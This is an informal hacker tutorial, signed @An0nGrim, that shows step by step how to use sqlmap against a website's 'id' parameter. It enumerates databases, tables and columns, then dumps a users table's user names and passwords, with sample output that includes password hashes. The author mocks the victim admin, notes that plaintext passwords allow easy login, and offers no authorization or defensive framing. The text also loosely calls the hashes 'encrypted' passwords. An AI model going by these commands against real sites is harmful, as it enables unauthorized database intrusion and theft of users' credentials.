Sqlmap tutorial by @An0nGrim

1. Tutorial on how to use sqlmap by:
2. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
3. ..::::::::::..
4. ..:::aad88888888baa:::..
5. .::::d:?888888888888?::8b::::.
6. .:::d8888:?888888888??a888888b:::.
7. .:::d8888888a88888888aa8888888888b:::.
8. ::::dP::::::::888888888888::::::::Yb::::
9. ::::dP:::::::::Y8888888888P:::::::::Yb::::
10. ::::d8:::::::::::Y88888888P:::::::::::8b::::
11. .::::88::@:::::::::Y888888P::@:::::::::88::::.
12. :::::Y8baaaaaaaaaa88P:T:Y88aaaaaaaaaaad8P:::::
13. :::::::Y88888888888P::|::Y888888888888P:::::::
14. ::::::::::::::::888:::|:::888:::::::::::::::::
15. ':::::::::::::::8888888888888b:::::::::::::::'
16. :::::::::::::::88888888888888:::::::::::::::
17. :::::::::::::d88888888888888::::::::::::::
18. ::::::::::::88::88::88:::88:::::::::::::
19. '::::::::::88::88::88:::88:::::::::::'
20. ':::::::::88::88::P::::88::::::::::'
21. ':::::::88::88:::::::88::::::::'
22. ''::::::::::::::::::::::::''
23. '':::::::::::::::''
24. @An0nGrim
25. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
26. sqlmap is an almost fully automated sql database penetration tool.
27. time to get started XD
28.  
29. the first command were going to use will scan the target for vulns
30.  
31. sqlmap -u "http://www.hackme.com/index.php?id=1" --dbs
32.  
33. obviously we would replace the url with our targets url, now sqlmap will start
34. scanning, in some cases it will ask if you want to skip scans to save time,
35. we do not want to skip scans so just type 'n', it may also ask if you want to include
36. certain types of scans we always want to say 'y' skipping scans is being lazy and
37. sqlmap might say our target is not vuln when because we skipped a few scans that
38. contained the vuln we would exploit. so never skip scans and always include all scan
39. types when asked.
40.  
41. sqlmap will output our targets database names in a similar format below.
42. if a database contains the "information_schema" db then navigateing through
43. the database should be a breeze. however if id does not contain it you will
44. end up haveing to brueforce your way through the database to get table names
45. and column names.
46. +-------------------+
47. |information_schema |
48. |database_name |
49. |test_db |
50. +-------------------+
51. sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" --table
52.  
53. this command will list the tables of the database you selected, when you select a database you
54. do ot want to select "information_schema" most of the data requires "root" to access or in other
55. words you will need to be an admin to read the data.
56.  
57. +-------------------+
58. |products |
59. |random_shit |
60. |users |
61. +-------------------+
62.  
63. above we have an example of a table list, the primary table we are going to access is the "users"
64. table so we type the following:
65.  
66. sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" -T "users" --columns
67.  
68. this command will access the columns inside the table, the output from sqlmap will look sorta like
69. the one below.
70.  
71. +-------------------+
72. |id |
73. |user_name |
74. |full_name |
75. |location |
76. |ip_address |
77. |last_name |
78. |password |
79. +-------------------+
80.  
81. above is an example of what you will see when retrieveing the collumns.
82. the main ones we want to access are the ones that contain the username and password,
83. the command to access the data in the columns is below.
84.  
85. i find it easy to open a few new terminal windows and access the usernames and passwords at the
86. same time.
87.  
88. sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" -T "users" -C "user_name" --dump
89. sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" -T "users" -C "password" --dump
90.  
91. now the out put will be the same as the others except with usernames
92.  
93. +-------------------+
94. |admin |
95. |user1 |
96. |user2 |
97. +-------------------+
98.  
99.  
100. and there are 2 outcomes for the password output:
101. outcome1:
102.  
103. +-------------------+
104. |admin |
105. |irrandom |
106. |iamhomo69 |
107. +-------------------+
108.  
109. outcome2:
110.  
111. +--------------------------------+
112. |c02b7d24a066adb747fdeb12deb21bfa|
113. |96e79218965eb72c92a549dd5a330112|
114. |f1981e4bd8a0d6d8462016d2fc6276b3|
115. +--------------------------------+
116.  
117. as showen in outcome1 the dumbass admin has not encrypted his
118. passwords (lulz) so loggin in wont be a problem however in outcome
119. we have encrypted passwords which means we will have to wait to decrypt them.
120.  
121. in my next tut i will explain password cracking in a nutshell (identifying diffrent types
122. of encryption and decrypting them)
123.  
124. if you have problems with the tutorial just message me what the problem is and i will correct
125. the issue
126.  
127. if you want to contact me you can get me on twitter:
128.  
129. AnonGrim
130. @An0nGrim
131.  
132. @An0nGrim